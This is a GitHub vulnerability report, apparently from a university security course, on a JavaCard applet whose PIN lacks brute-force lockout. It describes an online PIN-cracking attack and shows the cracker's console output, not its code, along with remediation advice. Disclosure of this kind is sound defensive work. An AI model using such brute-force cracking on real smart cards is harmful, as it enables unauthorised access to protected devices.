π΄ Security Vulnerability: PIN of the applet can be cracked with an online brute-force attack
mvondracek opened this issue Β· 0 comments
mvondracek commented
- Severity: HIGH
- Vulnerability Class: lack of online brute-force protections
- Description: According to the report, failed J-PAKE causes the application or applet to terminate the session (pp. 2β3). This was checked during code review. However, the applet does not block itself after several failed key agreements with an incorrect PIN. It is possible to perform an online brute-force attack to crack the PIN. This issue still applies even if the applet would be correctly installed with a randomly generated PIN (see #5).
- Exploit: In order to demonstrate the high severity of this issue, we have developed an example exploit. Our application
PV204Cracker(PIN Cracker for AlmostSecureApplet) is able to crack the PIN of the selected applet. Our PoC without any optimizations is able to brute-force the whole state space of numeric PINs under 13 minutes on the authorβs laptop (see below). Example PIN hardcoded as β1234β was cracked after 82 seconds after starting with β0000β. Our implemented PoC exploit is available in our forked repository. - Remediation: The applet must detect attempts to communicate with incorrect PIN, and it must securely and persistently count them. The applet must block itself when some defined threshold is reached (e.g., after 3 incorrect PINs).
- Location: for example applets/AlmostSecureApplet.java:334
Example output of implemented PIN cracker
PIN Cracker for AlmostSecureApplet
,-.
/ \ `. __..-,O
: \ --''_..-'.'
| . .-' `. '.
: . .`.'
\ `. / ..
\ `. ' .
`, `. \
,|,`. `-.\
'.|| ``-...__..-`
| |
|__|
/||\
//||\\
// || \\
__//__||__\\__
'--------------'
Connecting to card...
getInstance of assymetric algo: 10
getInstance of assymetric algo: 10 is OK!
Done.
Verbosity: output info after every 400 tried PINs
Start cracking...
2020-05-09 14:48:46.436 #0 pin = 00 00 00 00 [0, 0, 0, 0]
2020-05-09 14:49:14.051 #400 pin = 00 04 00 00 [0, 4, 0, 0]
2020-05-09 14:49:40.035 #800 pin = 00 08 00 00 [0, 8, 0, 0]
2020-05-09 14:50:06.586 #1200 pin = 01 02 00 00 [1, 2, 0, 0]
elapsed: 82418 ms
correct pin=[1, 2, 3, 4]
Output of implemented PIN cracker while all numeric PINs are searched under 13 minutes
PIN Cracker for AlmostSecureApplet
,-.
/ \ `. __..-,O
: \ --''_..-'.'
| . .-' `. '.
: . .`.'
\ `. / ..
\ `. ' .
`, `. \
,|,`. `-.\
'.|| ``-...__..-`
| |
|__|
/||\
//||\\
// || \\
__//__||__\\__
'--------------'
Connecting to card...
getInstance of assymetric algo: 10
getInstance of assymetric algo: 10 is OK!
Done.
Verbosity: output info after every 400 tried PINs
Start cracking...
2020-05-09 16:51:23.205 #0 pin = 00 00 00 00 [0, 0, 0, 0]
2020-05-09 16:51:53.380 #400 pin = 00 04 00 00 [0, 4, 0, 0]
2020-05-09 16:52:28.001 #800 pin = 00 08 00 00 [0, 8, 0, 0]
2020-05-09 16:52:56.242 #1200 pin = 01 02 00 00 [1, 2, 0, 0]
2020-05-09 16:53:25.937 #1600 pin = 01 06 00 00 [1, 6, 0, 0]
2020-05-09 16:54:01.472 #2000 pin = 02 00 00 00 [2, 0, 0, 0]
2020-05-09 16:54:33.435 #2400 pin = 02 04 00 00 [2, 4, 0, 0]
2020-05-09 16:55:02.400 #2800 pin = 02 08 00 00 [2, 8, 0, 0]
2020-05-09 16:55:30.321 #3200 pin = 03 02 00 00 [3, 2, 0, 0]
2020-05-09 16:56:02.271 #3600 pin = 03 06 00 00 [3, 6, 0, 0]
2020-05-09 16:56:28.962 #4000 pin = 04 00 00 00 [4, 0, 0, 0]
2020-05-09 16:56:57.817 #4400 pin = 04 04 00 00 [4, 4, 0, 0]
2020-05-09 16:57:27.712 #4800 pin = 04 08 00 00 [4, 8, 0, 0]
2020-05-09 16:57:58.589 #5200 pin = 05 02 00 00 [5, 2, 0, 0]
2020-05-09 16:58:28.075 #5600 pin = 05 06 00 00 [5, 6, 0, 0]
2020-05-09 16:58:58.125 #6000 pin = 06 00 00 00 [6, 0, 0, 0]
2020-05-09 16:59:30.312 #6400 pin = 06 04 00 00 [6, 4, 0, 0]
2020-05-09 17:00:01.441 #6800 pin = 06 08 00 00 [6, 8, 0, 0]
2020-05-09 17:00:29.815 #7200 pin = 07 02 00 00 [7, 2, 0, 0]
2020-05-09 17:00:59.417 #7600 pin = 07 06 00 00 [7, 6, 0, 0]
2020-05-09 17:01:29.951 #8000 pin = 08 00 00 00 [8, 0, 0, 0]
2020-05-09 17:02:04.731 #8400 pin = 08 04 00 00 [8, 4, 0, 0]
2020-05-09 17:02:40.510 #8800 pin = 08 08 00 00 [8, 8, 0, 0]
2020-05-09 17:03:11.007 #9200 pin = 09 02 00 00 [9, 2, 0, 0]
2020-05-09 17:03:41.565 #9600 pin = 09 06 00 00 [9, 6, 0, 0]
elapsed: 768007 ms
Discovered by Team Emerald.